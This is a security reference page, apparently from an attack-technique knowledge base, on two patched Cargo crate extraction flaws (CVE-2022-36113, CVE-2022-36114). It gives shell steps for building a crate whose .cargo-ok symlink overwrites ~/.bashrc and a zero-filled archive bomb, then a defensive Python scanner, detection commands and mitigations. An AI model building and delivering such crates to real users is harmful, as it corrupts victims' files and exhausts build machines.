Cargo Crate Extraction Attacks
Prerequisites
- Ability to get a hand-crafted .crate archive (a gzip-compressed tar) in front of the victim's Cargo. crates.io validates uploads server-side and rejects archives of this kind, so in practice the delivery channel is an alternate registry or mirror without equivalent checks, or a crate file placed in the victim's path by other means
- The victim must fetch the crate with any command that resolves and downloads dependencies (cargo build, cargo fetch, cargo install, cargo update)
- For the symlink attack: the victim's operating system must support symbolic links; the archive-bomb attack has no such requirement
Attack Scenarios
Symlink Traversal to Overwrite Arbitrary Files (CVE-2022-36113)
An attacker crafts a .crate archive containing a symbolic link whose target lies outside the crate's extraction directory. Vulnerable Cargo extracts the symlink as-is, and a later write to that path follows the link and lands on the target file on the victim's filesystem. In CVE-2022-36113 the write that followed the link was Cargo's own: after extracting a crate, Cargo records success by writing the marker file .cargo-ok at the root of the extracted source, so a crate shipping .cargo-ok as a symlink caused that marker write to corrupt whichever file the link pointed at. The content written is Cargo's marker rather than attacker-chosen bytes, but the attacker chooses the target, which is enough to damage configuration files, other projects' sources, or shell startup scripts.
# The attacker hand-builds the .crate tarball instead of running
# `cargo package`, so that a symlink entry survives in the archive
mkdir -p evil-crate-0.1.0/src
echo 'fn main() {}' > evil-crate-0.1.0/src/main.rs
cat > evil-crate-0.1.0/Cargo.toml << 'EOF'
[package]
name = "evil-crate"
version = "0.1.0"
edition = "2021"
EOF
# Cargo extracts the crate to
#   ~/.cargo/registry/src/index.crates.io-*/evil-crate-0.1.0/
# so five `..` components are needed to climb back to $HOME
# (three would only reach ~/.cargo/registry/).
# `.cargo-ok` is the marker file Cargo writes once extraction
# finishes; if that path already exists as a symlink, the write
# follows it to the target.
cd evil-crate-0.1.0
ln -s ../../../../../.bashrc .cargo-ok
cd ..
# Without -h/--dereference, tar stores the symlink as a symlink entry
tar czf evil-crate-0.1.0.crate evil-crate-0.1.0/
# On an unpatched Cargo (before 1.64.0), fetching the crate extracts
# the symlink and the subsequent `.cargo-ok` write corrupts ~/.bashrc
cargo install evil-crate
Disk Space Exhaustion via Archive Bomb (CVE-2022-36114)
An attacker publishes a crate whose .crate archive contains highly compressible data that expands to a very large size on extraction, exhausting the disk of whatever fetches it. Vulnerable Cargo placed no limit on the decompressed size, so a modest download could fill a build server, CI/CD runner, or developer machine; Cargo 1.64.0 fixed this by refusing to extract archives that exceed 512 MiB decompressed. Note that gzip, which .crate files use, compresses runs of identical bytes at roughly 1000:1, so a multi-gigabyte payload still costs the attacker a few megabytes of upload rather than a few kilobytes.
# Fill a source file with zeros: gzip compresses runs of zeros at
# roughly 1000:1, so 10 GiB of zeros becomes a ~10 MiB .crate
dd if=/dev/zero of=evil-crate-0.1.0/src/data.bin bs=1M count=10240
tar czf evil-crate-0.1.0.crate evil-crate-0.1.0/
# On the victim, any project that lists evil-crate as a dependency
# downloads and extracts the archive on its next dependency fetch:
cargo build
# Error: No space left on device
# The CI/CD runner or developer machine runs out of disk before the
# build even starts compiling
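Both scenarios above can be caught before extraction by reading the tar headers of a .crate and refusing archives whose link targets leave the crate's own top-level directory or whose declared decompressed size is too large. The scanner below is an added example written for this page, not Cargo's own code: the .crate layout (a tar.gz with every entry under <name>-<version>/) and the .cargo-ok marker are real, while the function names, the 512 MiB default (taken from Cargo's post-fix limit) and the three sample archives are constructed here. It serves both the symlink scenario and the archive-bomb scenario.

```python
"""Pre-extraction scanner for Cargo .crate archives (gzip-compressed tar).

Added example, not Cargo's own code. It walks the tar headers in memory and
flags (1) member names or symlink/hardlink targets that escape the crate's own
top-level directory and (2) a declared decompressed size above a limit.
"""
import io
import posixpath
import tarfile

# Assumption: Cargo 1.64.0 refuses archives above 512 MiB decompressed; the
# same figure is used as this scanner's default limit.
DEFAULT_SIZE_LIMIT = 512 * 1024 * 1024


def _top_dir(path: str) -> str:
    return posixpath.normpath(path).split("/", 1)[0]


def _inside_crate_dir(path: str, top: str) -> bool:
    """A path is safe only if it is relative and, once normalised, still starts
    with the crate's top-level directory (so "crate/../../x" is rejected)."""
    return (not posixpath.isabs(path)) and top not in ("", ".", "..") and _top_dir(path) == top


def scan_crate(crate_bytes: bytes, size_limit: int = DEFAULT_SIZE_LIMIT) -> dict:
    """Inspect an in-memory .crate; returns findings, sizes and an overall verdict."""
    findings = []
    total = 0
    with tarfile.open(fileobj=io.BytesIO(crate_bytes), mode="r:gz") as tf:
        # Member data is decompressed and discarded in memory; nothing is
        # written to the filesystem, so a bomb cannot fill the disk here.
        for m in tf:
            top = m.name.split("/", 1)[0]
            if not _inside_crate_dir(m.name, top):
                findings.append(f"member path escapes crate dir: {m.name}")
            if m.issym():
                # Symlink targets are relative to the link's own directory.
                target = posixpath.join(posixpath.dirname(m.name), m.linkname)
                if not _inside_crate_dir(target, top):
                    findings.append(f"symlink {m.name} -> {m.linkname} escapes crate dir")
            elif m.islnk():
                # Hard-link targets are archive-relative paths.
                if not _inside_crate_dir(m.linkname, top):
                    findings.append(f"hardlink {m.name} -> {m.linkname} escapes crate dir")
            elif m.isreg():
                total += m.size  # declared size from the header
            elif not m.isdir():
                findings.append(f"unexpected entry type {m.type!r}: {m.name}")
    if total > size_limit:
        findings.append(f"declared decompressed size {total} exceeds limit {size_limit}")
    return {
        "findings": findings,
        "compressed_size": len(crate_bytes),
        "decompressed_size": total,
        "ok": not findings,
    }


def build_crate(entries) -> bytes:
    """Construct a .crate in memory. Entries: ("file", name, bytes) or ("symlink", name, target)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        for kind, name, payload in entries:
            info = tarfile.TarInfo(name)
            if kind == "symlink":
                info.type = tarfile.SYMTYPE
                info.linkname = payload
                tf.addfile(info)
            else:
                info.size = len(payload)
                tf.addfile(info, io.BytesIO(payload))
    return buf.getvalue()


# Constructed sample archives for the demonstration (not real crates).
BENIGN_CRATE = build_crate([
    ("file", "good-crate-0.1.0/Cargo.toml", b'[package]\nname = "good-crate"\nversion = "0.1.0"\n'),
    ("file", "good-crate-0.1.0/src/main.rs", b"fn main() {}\n"),
])
# First scenario: .cargo-ok is the marker Cargo writes after extraction, so a
# symlink at that path is written through. Five ".." climb from
# registry/src/<index>/evil-crate-0.1.0/ up to $HOME.
SYMLINK_CRATE = build_crate([
    ("file", "evil-crate-0.1.0/Cargo.toml", b'[package]\nname = "evil-crate"\nversion = "0.1.0"\n'),
    ("symlink", "evil-crate-0.1.0/.cargo-ok", "../../../../../.bashrc"),
])
# Second scenario: 16 MiB of zeros gzip down to a few tens of KiB.
BOMB_CRATE = build_crate([
    ("file", "bomb-crate-0.1.0/Cargo.toml", b'[package]\nname = "bomb-crate"\nversion = "0.1.0"\n'),
    ("file", "bomb-crate-0.1.0/src/data.bin", bytes(16 * 1024 * 1024)),
])

if __name__ == "__main__":
    # The bomb sample is scanned with an 8 MiB limit so the small sample trips it.
    for label, crate, limit in [("benign", BENIGN_CRATE, DEFAULT_SIZE_LIMIT),
                                ("symlink", SYMLINK_CRATE, DEFAULT_SIZE_LIMIT),
                                ("bomb", BOMB_CRATE, 8 * 1024 * 1024)]:
        r = scan_crate(crate, limit)
        print(f"{label}: ok={r['ok']} compressed={r['compressed_size']} "
              f"decompressed={r['decompressed_size']} findings={r['findings']}")
```

The escape check normalises the path before comparing its first component with the crate directory, which is what catches both a direct `..` chain and the subtler `crate/../../x` form; hard links are resolved against the archive root rather than the member's directory because that is how tar records them. Run the scanner over a downloaded .crate in CI before handing it to a Cargo older than 1.64.0, or as a second opinion for an alternate registry that lacks crates.io's server-side validation.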
Detection
Check Cargo version for known patches
Verify that the installed Cargo includes the fixes for CVE-2022-36113 and CVE-2022-36114, which shipped in Rust 1.64.0 (September 2022); Cargo is versioned with Rust, so any version below 1.64.0 is affected.
cargo --version
Monitor disk usage during builds
Set up disk usage monitoring to detect sudden spikes during cargo build operations that could indicate an archive bomb.
# Monitor disk usage in the cargo registry during builds
watch -n 1 'du -sh ~/.cargo/registry/src/ 2>/dev/null'
Scan for symlinks in extracted crates
Check for unexpected symbolic links in the cargo registry source directory. A legitimate crate rarely contains symlinks at all; a `.cargo-ok` entry that is a symlink, or any link whose target resolves outside its crate's directory, is the specific indicator for CVE-2022-36113.
find ~/.cargo/registry/src/ -type l -ls
Mitigation
- Update Rust and Cargo to version 1.64.0 or later, which includes patches for both CVEs
- Set disk quotas on build environments to limit the impact of archive bombs
- Use containerized build environments with limited disk space allocation
- Monitor disk usage in CI/CD pipelines and fail builds that exceed thresholds
- Regularly audit the cargo registry cache for unexpected symlinks or large files